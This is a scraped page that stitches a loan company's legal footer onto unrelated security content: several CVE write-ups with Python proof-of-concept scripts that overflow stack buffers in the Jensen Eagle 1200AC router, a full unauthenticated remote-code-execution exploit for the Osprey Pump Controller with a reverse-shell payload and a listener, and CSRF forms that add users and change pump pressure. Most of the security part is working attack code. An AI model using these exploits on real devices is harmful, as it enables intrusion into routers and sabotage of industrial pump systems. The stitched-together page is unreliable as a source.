Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey1 parameter at /goform/WifiBasicSet.

©2018 Eagle Financial Services Inc. All rights reserved.  
designed & maintained by Cincinnati Webtec

Eagle Financial Services, Inc./ Eagle Loan Company of Ohio, Inc. All loans are subject to our normal credit policies, and may require collateral. Not all products or services available in all states. The information provided on this website is not a commitment to lend. Individual and Joint credit available. Other conditions may apply.

In Kentucky, Ohio, and Tennessee, loans are made and serviced by Eagle Financial Services, Inc., a Kentucky corporation. In Indiana, loans are made and serviced by Sunrise Finance Company, a separate Indiana Corporation. Neither corporation nor any of its respective affiliates, directors, officers, or employees assume responsible for any acts or omissions of the other.

The brand names, taglines, and other trademarks, as well as the designs of all Eagle products and promotions belong exclusively to Eagle Financial Services, Inc. and its subsidiary companies and are protected from copying and simulation under trademark and copyright laws.

The contents of the Eagle Financial Services, Inc. website are protected from copying and distribution under national and international copyright laws and treaties throughout the world. All rights reserved.

Neither Eagle Financial Services, Inc. nor any of its affiliates, directors, officers, or employees assume any responsibility for errors or omissions in the materials in this web site. THESE MATERIALS ARE PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT.

Additionally, neither Eagle Financial Services, Inc. nor any of its affiliates, directors, officers or employees warrant the accuracy or completeness of the information, text, graphics, links or other items contained within these materials. Neither Eagle Financial Services, Inc. nor any of its affiliates, directors, officers or employees shall be liable for any special, indirect, incidental, or consequential damages, including without limitation, lost revenues or lost profits, which may result from the use of these materials. Eagle Financial Services, Inc. may make changes to these materials, or to the products described therein, at any time without notice. Eagle Financial Services, Inc. makes no commitment to update the information.

**Our Accessibility Statement**

It is the policy of Eagle Financial Services, Inc. (“Eagle”) to ensure that our services are accessible to our customers and the public, regardless of disability status, to the extent required by law. Please contact your local branch office to learn more about accessibility support services at Eagle.

**Reasonable Accommodations**  
Individuals who need a reasonable accommodation to access Eagle’s services should send an email by clicking here to provide information about the nature of the requested accommodation. Requesters should include contact information such as an email address or telephone number at which they can be reached. Depending on the nature of the request, Eagle may need sufficient notice to provide a reasonable accommodation.

**Online Accessibility**  
Eagle has designed its website with accessibility in mind. In the event that a user with a disability experiences accessibility issues with our website, please notify us by clicking here. In your communication to us please list the words "Online Accessibility" in the subject, please specify the nature of the accessibility difficulty and including the web address that may have presented an accessibility challenge.

**Third-Party Websites**  
Eagle’s website contains links to webpages hosted by third parties. Eagle does not make representations with regard to the accessibility of third-party websites and is not able to remediate accessibility barriers on such websites.

**Feedback**  
We are always working to ensure that our services are accessible to all customers and the public, including individuals with disabilities. If you have an idea or question about accessibility support services at Eagle, please contact your local branch office.

**BEWARE OF SCAMS!** Eagle will never ask you to send us cash, money orders, or gift cards as a condition to loan approval. In addition, we do not send loan checks by mail. If you are approved for a loan with us, you will close your loan in one of our offices with a member of our friendly staff. We also do not accept online payments or use text messaging for payment reminders. If you have any questions, please call your local office.

CVE-2023-24127: Eagle Financial Services Inc.

Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey4_5g parameter at /goform/WifiBasicSet.

**\[CVE-2023-24126\] DoS via wepkey4\_5g parameter in Eagle 1200ac****Description**

Jensen of Scandinavia Eagle 1200AC V15.03.06.33\_en was discovered to contain a stack overflow via the wepkey4\_5g parameter at /goform/WifiBasicSet.

**Additional information**

In the handler function for action /goform/WifiBasicSet (formWifiBasicSet), the user-controlled string wepkey4_5g is stored into wl5g.extra.wep_key4 via SetValue.

When then calling /goform/WifiBasicGet (formWifiBasicGet), the string is loaded from wl5g.extra.wep_key4 and then stored into stack buffer wifi\_buf\_entry. Because the length of wepkey4_5g is not checked, the stack buffer can be overflowed if it is a large string.

**PoC script:**

    import requests
    
    IP="192.168.38.1"
    
    logindata = {
    "username":"admin",
    "password":"81dc9bdb52d04dc20036dbd8313ed055"
    }
    
    def login():
    	for i in range(10):
    		session = requests.Session()
    		res = session.post(f"http://{IP}/login/Auth", data=logindata)
    		try:
    			passwd = session.cookies["password"]
    			return passwd
    		except:
    			pass
    
    session = requests.Session()
    session.cookies.set("password",login())
    
    payload = {
        "wepkey4_5g" : "A"*(0x1000),
        "security" : "wep"
        }
    res = session.post(f"http://{IP}/goform/WifiBasicSet", data=payload)
    print(res.status_code)
    
    res = session.post(f"http://{IP}/goform/WifiBasicGet")
    print(res.text)
    print(res)

CVE-2023-24126: [CVE-2023-24126] DoS via wepkey4_5g parameter in Eagle 1200ac

Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey2_5g parameter at /goform/WifiBasicSet.

**\[CVE-2023-24125\] DoS via wepkey2\_5g parameter in Eagle 1200ac****Description**

Jensen of Scandinavia Eagle 1200AC V15.03.06.33\_en was discovered to contain a stack overflow via the wepkey2\_5g parameter at /goform/WifiBasicSet.

**Additional information**

In the handler function for action /goform/WifiBasicSet (formWifiBasicSet), the user-controlled string wepkey2_5g is stored into wl5g.extra.wep_key2 via SetValue.

When then calling /goform/WifiBasicGet (formWifiBasicGet), the string is loaded from wl5g.extra.wep_key2 and then stored into stack buffer wifi\_buf\_entry. Because the length of wepkey2_5g is not checked, the stack buffer can be overflowed if it is a large string.

**PoC script:**

    import requests
    
    IP="192.168.38.1"
    
    logindata = {
    "username":"admin",
    "password":"81dc9bdb52d04dc20036dbd8313ed055"
    }
    
    def login():
    	for i in range(10):
    		session = requests.Session()
    		res = session.post(f"http://{IP}/login/Auth", data=logindata)
    		try:
    			passwd = session.cookies["password"]
    			return passwd
    		except:
    			pass
    
    session = requests.Session()
    session.cookies.set("password",login())
    
    payload = {
        "wepkey2_5g" : "A"*(0x1000),
        "security" : "wep"
        }
    res = session.post(f"http://{IP}/goform/WifiBasicSet", data=payload)
    print(res.status_code)
    
    res = session.post(f"http://{IP}/goform/WifiBasicGet")
    print(res.text)
    print(res)

CVE-2023-24125: [CVE-2023-24125] DoS via wepkey2_5g parameter in Eagle 1200ac

Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepauth parameter at /goform/WifiBasicSet.

**\[CVE-2023-24123\] DoS via wepauth parameter in Eagle 1200ac****Description**

Jensen of Scandinavia Eagle 1200AC V15.03.06.33\_en was discovered to contain a stack overflow via the wepauth parameter at /goform/WifiBasicSet.

**Additional information**

In the handler function for action /goform/WifiBasicSet (formWifiBasicSet), the user-controlled string wepauth is stored into wl2g.extra.wep_type via SetValue.

When then calling /goform/WifiBasicGet (formWifiBasicGet), the string is loaded from wl2g.extra.wep_type and then stored into stack buffer wifi\_buf\_entry. Because the length of wepauth is not checked, the stack buffer can be overflowed if it is a large string.

**PoC script:**

    import requests
    
    IP="192.168.38.1"
    
    logindata = {
    "username":"admin",
    "password":"81dc9bdb52d04dc20036dbd8313ed055"
    }
    
    def login():
    	for i in range(10):
    		session = requests.Session()
    		res = session.post(f"http://{IP}/login/Auth", data=logindata)
    		try:
    			passwd = session.cookies["password"]
    			return passwd
    		except:
    			pass
    
    session = requests.Session()
    session.cookies.set("password",login())
    
    payload = {
        "wepauth" : "A"*(0x1000),
        "security" : "wep"
        }
    res = session.post(f"http://{IP}/goform/WifiBasicSet", data=payload)
    print(res.status_code)
    
    res = session.post(f"http://{IP}/goform/WifiBasicGet")
    print(res.text)
    print(res)

CVE-2023-24123: [CVE-2023-24123] DoS via wepauth parameter in Eagle 1200ac

Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the ssid_5g parameter at /goform/WifiBasicSet.

**\[CVE-2023-24122\] DoS via ssid\_5g parameter in Eagle 1200ac****Description**

Jensen of Scandinavia Eagle 1200AC V15.03.06.33\_en was discovered to contain a stack overflow via the ssid\_5g parameter at /goform/WifiBasicSet.

**Additional information**

In the handler function for action /goform/WifiBasicSet (formWifiBasicSet), the user-controlled string ssid_5g is stored into wl5g.extra.ssid via SetValue.

When then calling /goform/WifiBasicGet (formWifiBasicGet), the string is loaded from wl5g.extra.ssid and then stored into stack buffer wifi\_buf\_entry. Because the length of ssid_5g is not checked, the stack buffer can be overflowed if it is a large string.

**PoC script:**

    import requests
    
    IP="192.168.38.1"
    
    logindata = {
    "username":"admin",
    "password":"81dc9bdb52d04dc20036dbd8313ed055"
    }
    
    def login():
    	for i in range(10):
    		session = requests.Session()
    		res = session.post(f"http://{IP}/login/Auth", data=logindata)
    		try:
    			passwd = session.cookies["password"]
    			return passwd
    		except:
    			pass
    
    session = requests.Session()
    session.cookies.set("password",login())
    
    payload = {"ssid_5g" : "A"*(0x1000)}
    
    res = session.post(f"http://{IP}/goform/WifiBasicSet", data=payload)
    print(res.status_code)
    
    res = session.post(f"http://{IP}/goform/WifiBasicGet")
    print(res.text)
    print(res)

CVE-2023-24122: [CVE-2023-24122] DoS via ssid_5g parameter in Eagle 1200ac

Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the security_5g parameter at /goform/WifiBasicSet.

**\[CVE-2023-24121\] DoS via security\_5g parameter in Eagle 1200ac****Description**

Jensen of Scandinavia Eagle 1200AC V15.03.06.33\_en was discovered to contain a stack overflow via the security\_5g parameter at /goform/WifiBasicSet.

**Additional information**

In the handler function for action /goform/WifiBasicSet (formWifiBasicSet), the user-controlled string security_5g is stored into wl5g.extra.security via SetValue.

When then calling /goform/WifiBasicGet (formWifiBasicGet), the string is loaded from wl5g.extra.security and then stored into stack buffer wifi\_buf\_entry. Because the length of security_5g is not checked, the stack buffer can be overflowed if it is a large string.

**PoC script:**

    import requests
    
    IP="192.168.38.1"
    
    logindata = {
    "username":"admin",
    "password":"81dc9bdb52d04dc20036dbd8313ed055"
    }
    
    def login():
    	for i in range(10):
    		session = requests.Session()
    		res = session.post(f"http://{IP}/login/Auth", data=logindata)
    		try:
    			passwd = session.cookies["password"]
    			return passwd
    		except:
    			pass
    
    session = requests.Session()
    session.cookies.set("password",login())
    
    payload = {"security_5g" : "A"*(0x800)}
    
    res = session.post(f"http://{IP}/goform/WifiBasicSet", data=payload)
    print(res.status_code)
    
    res = session.post(f"http://{IP}/goform/WifiBasicGet")
    print(res.text)
    print(res)

CVE-2023-24121: [CVE-2023-24121] DoS via security_5g parameter in Eagle 1200ac

Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepauth_5g parameter at /goform/WifiBasicSet.

**\[CVE-2023-24117\] DoS via wepauth\_5g parameter in Eagle 1200ac****Description**

Jensen of Scandinavia Eagle 1200AC V15.03.06.33\_en was discovered to contain a stack overflow via the wepauth\_5g parameter at /goform/WifiBasicSet.

**Additional information**

In the handler function for action /goform/WifiBasicSet (formWifiBasicSet), the user-controlled string wepauth_5g is stored into wl5g.extra.wep_type via SetValue.

When then calling /goform/WifiBasicGet (formWifiBasicGet), the string is loaded from wl5g.extra.wep_type and then stored into stack buffer wifi\_buf\_entry. Because the length of wepauth_5g is not checked, the stack buffer can be overflowed if it is a large string.

**PoC script:**

    import requests
    
    IP="192.168.38.1"
    
    logindata = {
    "username":"admin",
    "password":"81dc9bdb52d04dc20036dbd8313ed055"
    }
    
    def login():
    	for i in range(10):
    		session = requests.Session()
    		res = session.post(f"http://{IP}/login/Auth", data=logindata)
    		try:
    			passwd = session.cookies["password"]
    			return passwd
    		except:
    			pass
    
    session = requests.Session()
    session.cookies.set("password",login())
    
    payload = {
        "wepauth_5g" : "A"*(0x1000),
        "security" : "wep"
        }
    res = session.post(f"http://{IP}/goform/WifiBasicSet", data=payload)
    print(res.status_code)
    
    res = session.post(f"http://{IP}/goform/WifiBasicGet")
    print(res.text)
    print(res)

CVE-2023-24117: [CVE-2023-24117] DoS via wepauth_5g parameter in Eagle 1200ac

Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey4 parameter at /goform/WifiBasicSet.

**\[CVE-2023-24129\] DoS via wepkey4 parameter in Eagle 1200ac****Description**

Jensen of Scandinavia Eagle 1200AC V15.03.06.33\_en was discovered to contain a stack overflow via the wepkey4 parameter at /goform/WifiBasicSet.

**Additional information**

In the handler function for action /goform/WifiBasicSet (formWifiBasicSet), the user-controlled string wepkey4 is stored into wl2g.extra.wep_key4 via SetValue.

When then calling /goform/WifiBasicGet (formWifiBasicGet), the string is loaded from wl2g.extra.wep_key4 and then stored into stack buffer wifi\_buf\_entry. Because the length of wepkey4 is not checked, the stack buffer can be overflowed if it is a large string.

**PoC script:**

    import requests
    
    IP="192.168.38.1"
    
    logindata = {
    "username":"admin",
    "password":"81dc9bdb52d04dc20036dbd8313ed055"
    }
    
    def login():
    	for i in range(10):
    		session = requests.Session()
    		res = session.post(f"http://{IP}/login/Auth", data=logindata)
    		try:
    			passwd = session.cookies["password"]
    			return passwd
    		except:
    			pass
    
    session = requests.Session()
    session.cookies.set("password",login())
    
    payload = {
        "wepkey4" : "A"*(0x1000),
        "security" : "wep"
        }
    res = session.post(f"http://{IP}/goform/WifiBasicSet", data=payload)
    print(res.status_code)
    
    res = session.post(f"http://{IP}/goform/WifiBasicGet")
    print(res.text)
    print(res)

CVE-2023-24129: [CVE-2023-24129] DoS via wepkey4 parameter in Eagle 1200ac

Osprey Pump Controller version 1.0.1 unauthenticated remote code execution exploit.

    #!/usr/bin/env python### Osprey Pump Controller 1.0.1 Unauthenticated Remote Code Execution Exploit### Vendor: ProPump and Controls, Inc.# Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com# Affected version: Software Build ID 20211018, Production 10/18/2021#                   Mirage App: MirageAppManager, Release [1.0.1]#                   Mirage Model 1, RetroBoard II### Summary: Providing pumping systems and automated controls for# golf courses and turf irrigation, municipal water and sewer,# biogas, agricultural, and industrial markets. Osprey: door-mounted,# irrigation and landscape pump controller.## Technology hasn't changed dramatically on pump and electric motors# in the last 30 years. Pump station controls are a different story.# More than ever before, customers expect the smooth and efficient# operation of VFD control. Communications—monitoring, remote control,# and interfacing with irrigation computer programs—have become common# requirements. Fast and reliable accessibility through cell phones# has been a game changer.## ProPump & Controls can handle any of your retrofit needs, from upgrading# an older relay logic system to a powerful modern PLC controller, to# converting your fixed speed or first generation VFD control system to# the latest control platform with communications capabilities.## We use a variety of solutions, from MCI-Flowtronex and Watertronics# package panels to sophisticated SCADA systems capable of controlling# and monitoring networks of hundreds of pump stations, valves, tanks,# deep wells, or remote flow meters.## User friendly system navigation allows quick and easy access to all# critical pump station information with no password protection unless# requested by the customer. Easy to understand control terminology allows# any qualified pump technician the ability to make basic changes without# support. Similar control and navigation platform compared to one of the# most recognized golf pump station control systems for the last twenty# years make it familiar to established golf service groups nationwide.# Reliable push button navigation and LCD information screen allows the# use of all existing control panel door switches to eliminate the common# problems associated with touchscreens.## Global system configuration possibilities allow it to be adapted to# virtually any PLC or relay logic controlled pump stations being used in# the industrial, municipal, agricultural and golf markets that operate# variable or fixed speed. On board Wi-Fi and available cellular modem# option allows complete remote access.## Desc: The controller suffers from an unauthenticated command injection# vulnerability that allows system access with www-data permissions.## ----------------------------------------------------------------------# Triggering command injection...# Trying vector: /DataLogView.php# Operator...?# You got a call from 192.168.3.180:54508# www-data@OspreyController:/var/www/html$ id;pwd# uid=33(www-data) gid=33(www-data) groups=33(www-data)# /var/www/html# www-data@OspreyController:/var/www/html$ exit# Zya!# ----------------------------------------------------------------------## Tested on: Apache/2.4.25 (Raspbian)#            Raspbian GNU/Linux 9 (stretch)#            GNU/Linux 4.14.79-v7+ (armv7l)#            Python 2.7.13 [GCC 6.3.0 20170516]#            GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git#            PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# Macedonian Information Security Research and Development Laboratory# Zero Science Lab - https://www.zeroscience.mk - @zeroscience### Advisory ID: ZSL-2023-5754# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5754.php### 05.01.2023##                   o    o#                  O    O#                   o    o#                    o    o#_____________________\  /#                      ||#                      ||#                      ||from  time  import   sleepimport pygame.midi   #---#import subprocess    #---#import threading    #-----#import telnetlib    #-----#import requests    #-------#import socket    #-----------#import pygame    #-----------#import random    #-----------#import sys     #---------------#import re     #-----------------####### #      #-----------------#class Pump__it__up:    def __init__(self):        self.sound=False        self.param="eventFileSelected"        self.vector=["/DataLogView.php?"+self.param,                     "/AlarmsView.php?"+self.param,                     "/EventsView.php?"+self.param,                     "/index.php"] # POST        self.payload=None        self.sagent="Tic"        self.rhost=None        self.lhost=None        self.lport=None    def propo(self):        if len(sys.argv)!=4:            self.kako()        else:            self.presh()            self.rhost=sys.argv[1]            self.lhost=sys.argv[2]            self.lport=int(sys.argv[3])            if not "http" in self.rhost:                self.rhost="http://{}".format(self.rhost)    def kako(self):        self.pumpaj()        print("Ovakoj: python {} [RHOST:RPORT] [LHOST] [LPORT]".format(sys.argv[0]))        exit(0)    def pumpaj(self):        titl="""                 .-.                 |  \\                 | / \\             ,___| |  \\            / ___( )   L           '-`   | |   |                 | |   F                 | |  /                 | |                 | |             ____|_|____            [___________]      ,,,,,/,,,,,,,,,,,,,\\,,,,,o-------------------------------------o Osprey Pump Controller RCE Rev Shel_                v1.0j          Ref: ZSL-2023-5754            by lqwrm, 2023o-------------------------------------o        """        print(titl)    def injekcija(self):        self.headers={"Accept":"*/*",                      "Connection":"close",                      "User-Agent":self.sagent,                      "Cache-Control":"max-age=0",                       "Accept-Encoding":"gzip,deflate",                      "Accept-Language":"en-US,en;q=0.9"}            self.payload =";"######################################################"        self.payload+="/usr/bin/python%20-c%20%27import%20socket,subprocess,os;"        self.payload+="s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.con"        self.payload+="nect((%22"+self.lhost+"%22,"+str(self.lport)+"));os.dup2"        self.payload+="(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),"        self.payload+="2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27"#######"                print("Triggering command injection...")                for url in self.vector:            if url=="/index.php":                print("Trying vector:",url)                import urllib.parse                self.headers["Content-Type"]="application/x-www-form-urlencoded"                self.postdata={"userName":urllib.parse.unquote(self.payload),                               "pseudonym":"251"}                r=requests.post(self.rhost+url,headers=self.headers,data=self.postdata)                if r.status_code == 200:                    break            else:                print("Trying vector:",url[:-18])                r=requests.get(self.rhost+url+"="+self.payload,headers=self.headers)                print("Code:",r.status_code)                if r.status_code == 200:                    print('Access Granted!')                    break    def netcat(self):        import nclib        server = nclib.TCPServer(("0.0.0.0",int(self.lport)))        print("Operator...?")        server.sock.settimeout(7)        for client in server:            print("You got a call from %s:%d" % client.peer)            command=""            while command!="exit":                if len(command)>0:                    if command in client.readln().decode("utf-8").strip(" "):                        pass                data = client.read_until('$')                print(data.decode("utf-8"), end="")                command = input(" ")                client.writeln(command)            print("Zya!")            exit(1)    def rasplet(self):        if self.sound:            konac1=threading.Thread(name="Pump_Up_The_Jam_1",target=self.entertain)            konac1.start()        konac2=threading.Thread(name="Pump_Up_The_Jam_2",target=self.netcat)        konac2.start()        self.injekcija()    def presh(self):        titl2="""  _______________________________________ /                                       \\|  {###################################}  ||  {##     Osprey Pump Controller    ##}  ||  {##            RCE 0day           ##}  ||  {##                               ##}  ||  {##         ZSL-2023-5754         ##}  ||  {###################################}  ||                                         ||               80  90  100               ||            70     ^      120            ||        60 *      /|\       * 140        ||    55             |              160    ||                   |                     ||                   |                     ||   (O)            (+)              (O)   | \_______________________________________/        """        print(titl2)    def entertain(self):                pygame.midi.init()        midi_output=pygame.midi.Output(0)            notes=[            (74,251),(86,251),(76,251),(88,251),(84,251),(72,251),(69,251),(81,251),            (83,251),(71,251),(67,251),(79,251),(74,251),(62,251),(64,251),(76,251),            (72,251),(60,251),(69,251),(57,251),(59,251),(71,251),(55,251),(67,251),            (62,251),(50,251),(64,251),(52,251),(48,251),(60,251),(57,251),(45,251),            (47,251),(59,251),(45,251),(57,251),(56,251),(44,251),(43,251),(55,251),            (67,251),(43,251),(55,251),(79,251),(71,251),(74,251),(55,251),(59,251),            (62,251),(63,251),(48,251),(64,251),(72,251),(52,251),(55,251),(60,251),            (64,251),(43,251),(55,251),(72,251),(60,251),(64,251),(55,251),(58,251),            (72,251),(41,251),(53,251),(60,251),(57,251),(52,251),(40,251),(72,251),            (76,251),(84,251),(55,251),(60,251),(77,251),(86,251),(74,251),(75,251),            (78,251),(87,251),(79,251),(43,251),(76,251),(88,251),(72,251),(84,251),            (76,251),(60,251),(55,251),(86,251),(74,251),(77,251),(52,251),(88,251),            (79,251),(76,251),(43,251),(83,251),(74,251),(71,251),(86,251),(74,251),            (77,251),(59,251),(53,251),(55,251),(76,251),(84,251),(48,251),(72,251),            (52,251),(55,251),(60,251),(52,251),(55,251),(60,251),(55,251),(59,251),            (62,251),(63,251),(64,251),(48,251),(72,251),(60,251),(52,251),(55,251),            (64,251),(43,251),(55,251),(72,251),(64,251),(55,251),(58,251),(60,251),            (72,251),(41,251),(53,251),(60,251),(57,251),(40,251),(52,251),(72,251),            (51,251),(81,251),(39,251),(69,251),(67,251),(79,251),(72,251),(38,251),            (50,251),(78,251),(66,251),(72,251),(69,251),(81,251),(50,251),(72,251),            (54,251),(57,251),(84,251),(60,251),(76,251),(88,251),(50,251),(74,251),            (86,251),(84,251),(54,251),(57,251),(60,251),(72,251),(69,251),(81,251)]        channel=0        velocity=124        for note, duration in notes:            midi_output.note_on(note, velocity, channel)            duration=59            pygame.time.wait(random.randint(100,301))            pygame.time.wait(duration)            midi_output.note_off(note, velocity, channel)            del midi_output        pygame.midi.quit()    def main(self):        self.propo()        self.rasplet()        exit(1)if __name__=='__main__':    Pump__it__up().main()

Osprey Pump Controller 1.0.1 Unauthenticated Remote Code Execution

Osprey Pump Controller version 1.0.1 suffers from a cross site request forgery vulnerability.

CSRF Add User:--------------<html>  <body>    <form action="http://TARGET/setSystemText.php">      <input type="hidden" name="sysTextValue" value="test" />      <input type="hidden" name="sysTextName" value="USERNAME1" />      <input type="hidden" name="backTargetLinkNumber" value="75" />      <input type="hidden" name="userName" value="ZSL" />      <input type="submit" value="Add user" />    </form>  </body></html>CSRF Set Password:------------------<html>  <body>    <form action="http://TARGET/setSystemText.php">      <input type="hidden" name="sysTextValue" value="pass" />      <input type="hidden" name="sysTextName" value="USERPW1" />      <input type="hidden" name="backTargetLinkNumber" value="75" />      <input type="hidden" name="userName" value="t00t" />      <input type="submit" value="Set pass" />    </form>  </body></html>CSRF Set System Pressure Raw:-----------------------------<html>  <body>    <form action="http://TARGET/mbSetRegister_Int.php">      <input type="hidden" name="regValue" value="17301" />      <input type="hidden" name="regAddress" value="40900" />      <input type="hidden" name="minValue" value="0" />      <input type="hidden" name="maxValue" value="32767" />      <input type="hidden" name="backTargetLinkNumber" value="414" />      <input type="hidden" name="userName" value="w00t" />      <input type="submit" value="Modify pressure" />    </form>  </body></html>

Tag

#wifi